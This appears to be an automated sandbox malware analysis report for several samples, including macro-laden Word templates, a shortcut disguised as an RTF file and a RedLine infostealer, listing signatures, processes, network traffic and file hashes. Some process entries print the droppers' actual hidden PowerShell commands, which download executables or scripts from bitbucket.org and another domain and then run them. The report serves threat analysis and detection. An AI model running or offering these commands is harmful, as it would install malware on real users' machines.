Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"

Network

N/A

Files

memory/2944-0-0x000000007449E000-0x000000007449F000-memory.dmp

memory/2944-1-0x0000000000340000-0x0000000000548000-memory.dmp

memory/2944-2-0x0000000074490000-0x0000000074B7E000-memory.dmp

memory/2944-3-0x000000007449E000-0x000000007449F000-memory.dmp

memory/2944-4-0x0000000074490000-0x0000000074B7E000-memory.dmp

memory/2944-5-0x0000000074490000-0x0000000074B7E000-memory.dmp

memory/3048-8-0x0000000074551000-0x0000000074552000-memory.dmp

memory/3048-9-0x0000000074550000-0x0000000074AFB000-memory.dmp

memory/3048-11-0x0000000074550000-0x0000000074AFB000-memory.dmp

memory/3048-10-0x0000000074550000-0x0000000074AFB000-memory.dmp

memory/3048-12-0x0000000074550000-0x0000000074AFB000-memory.dmp

memory/3048-13-0x0000000074550000-0x0000000074AFB000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win7-20240903-en

Max time kernel

125s

Max time network

124s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
IE 185.166.142.23:443 bitbucket.org tcp
IE 185.166.142.23:443 bitbucket.org tcp
IE 185.166.142.23:443 bitbucket.org tcp
IE 185.166.142.23:443 bitbucket.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

memory/3044-0-0x000000002F081000-0x000000002F082000-memory.dmp

memory/3044-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3044-2-0x000000007131D000-0x0000000071328000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA91E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarA98E.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\{623B6A75-00E4-42B5-83F1-144E23162D60}

MD5 364883f2918d321cf88eb0277b178cde
SHA1 4c75a1bffa09228ed3da1fc2d9b0008fa5bb671b
SHA256 3bb37d90aaebda892c262dd318c2a311ed65b0f24b90106f9a625d3ac3adea0f
SHA512 9980d0e111c0a3e2999a59e98e8d2dc3aa4d02c346dd1302708e03abfd14fe2982fb1db2c7e1709c2fb27a1011506b9288fe9524ac0abb981374bc33d23de806

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{77216855-F693-4243-912C-A0DE14A27247}.FSD

MD5 556adc86e6e253a6cc9d711e08257e04
SHA1 c4407d6fbc05987c10b7d7e5ed9b310175c924f3
SHA256 105d3e6fb4c64c845cb876aad5e8b2c3e7e9e4a6ece6f82bdda666d2df2ac84f
SHA512 8865f42e5ee26d654bae985e1fec7cdea93001ad987a3de1a54ae6bb91dd2e1466484a0de6ef74575d1f2c3007ec581f68294dc9a50855e1031b7b3cd3e958b0

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 09e1bf6067381c630e302c845975cb21
SHA1 8dcd0c3a52d57ab9f44db4c06cb525eb5d7ae243
SHA256 e278a25493b0668f2cf0ec3667b14a505715c3af974d165f84689976cfd83f91
SHA512 bef4d2c5b8ef8e6aab86fbf0eed7ec8504db779016462472ae35892ebd0ad94619fda33d85a66eabfd4946958cba6f1e030017117be32e36bbec2357c6070904

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{8DFAB033-4FFA-499F-A6F3-AC78419960CB}.FSD

MD5 298ee91ff3e7b94f4a859d839be8f894
SHA1 6ee4265c3ad84ec30e1f73c17a30c8f73f4ff86a
SHA256 1157b893d0d08c6a96efc414e9f02cd26d801c8a2fc7ebed3283b465737daaf9
SHA512 6eeb5a6254e498f86ebb88216e36814fe7f12da5a9f1e2a1f9885831067c06646317cec9cca42837ee503285e0d0891a1686bd97243d9b7ae22e8a3454358647

memory/3044-111-0x000000007131D000-0x0000000071328000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm" /o ""

C:\Users\Admin\AppData\Local\Temp\powershell.exe

C:\Users\Admin\AppData\Local\Temp\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/4584-1-0x00007FF87446D000-0x00007FF87446E000-memory.dmp

memory/4584-4-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4584-5-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4584-3-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4584-7-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4584-6-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-10-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-9-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-8-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-2-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-0-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4584-12-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-11-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

memory/4584-13-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

memory/4584-30-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-31-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-32-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-41-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-42-0x00007FF87446D000-0x00007FF87446E000-memory.dmp

memory/4584-43-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-44-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-45-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 7682d4d2079c6d281210acc35dea3f49
SHA1 5a5e94642a8dc681777b586dab28a5ad8cf37a19
SHA256 5ba4634105483ab09492666674ff826f7d2e7e6acb6508c2a3668f0ff937b507
SHA512 d528ab74a67f16ebc4bb96b358db0ecd0f8a203a327d85b80d94272651be80d191c69932ca23648c3c3426755b4bb87f03c16e5c0597b104beac74225e232dd8

memory/4584-51-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4584-55-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCD3EC2.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

89s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3908 set thread context of 5112 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3908 -ip 3908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5112 -ip 5112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 728

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3908-0-0x00000000006CC000-0x00000000006CD000-memory.dmp

memory/5112-1-0x0000000000400000-0x0000000000446000-memory.dmp

memory/5112-6-0x00000000752DE000-0x00000000752DF000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win7-20240708-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -Command "Start-BitsTransfer -Source 'https://musiccenterconference.com/dwl/12.ps1' -Destination $($env:APPDATA + '\12.ps1'); & $($env:APPDATA + '\12.ps1')"

Network

N/A

Files

memory/2404-38-0x000007FEF565E000-0x000007FEF565F000-memory.dmp

memory/2404-39-0x000000001B460000-0x000000001B742000-memory.dmp

memory/2404-40-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2404-41-0x0000000002800000-0x0000000002808000-memory.dmp

memory/2404-44-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2404-42-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2404-43-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2404-45-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2404-46-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/Zos.e`xe -Dest C:\Users\Public\Zos.e`xe;C:\Users\Public\Zos.e`xe

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 70.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 169.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/1984-1-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

memory/1984-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

memory/1984-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

memory/1984-0-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp

memory/1984-4-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-8-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

memory/1984-9-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-12-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-11-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-10-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-13-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

memory/1984-7-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-14-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-15-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-6-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-5-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

memory/1984-16-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

memory/1984-17-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-18-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-30-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-31-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wxtsu0t.wm5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4440-43-0x00000247EF2B0000-0x00000247EF2D2000-memory.dmp

memory/4440-46-0x00000247EF280000-0x00000247EF2A6000-memory.dmp

memory/4440-47-0x00000247EF760000-0x00000247EF774000-memory.dmp

memory/1984-51-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp

memory/1984-52-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-53-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-56-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 c59357e50e9bb8768be6c8e793ee6774
SHA1 a5a98a042eac13aa504035bc6e0c2787f29acfef
SHA256 c62265fbaf204f1cd8491ba62a29b839828e00c5a250ff3801276dcbf75fb93e
SHA512 0fad33925e276650fdfc3adefbe4bca684d5160806caa3fa7612064ba53578f3463bebe5d276186efc80bd2c8a0569e2d9aef85a2b39e437c24301aa6d76bd84

memory/1984-65-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

memory/1984-66-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCD3146.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

157s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
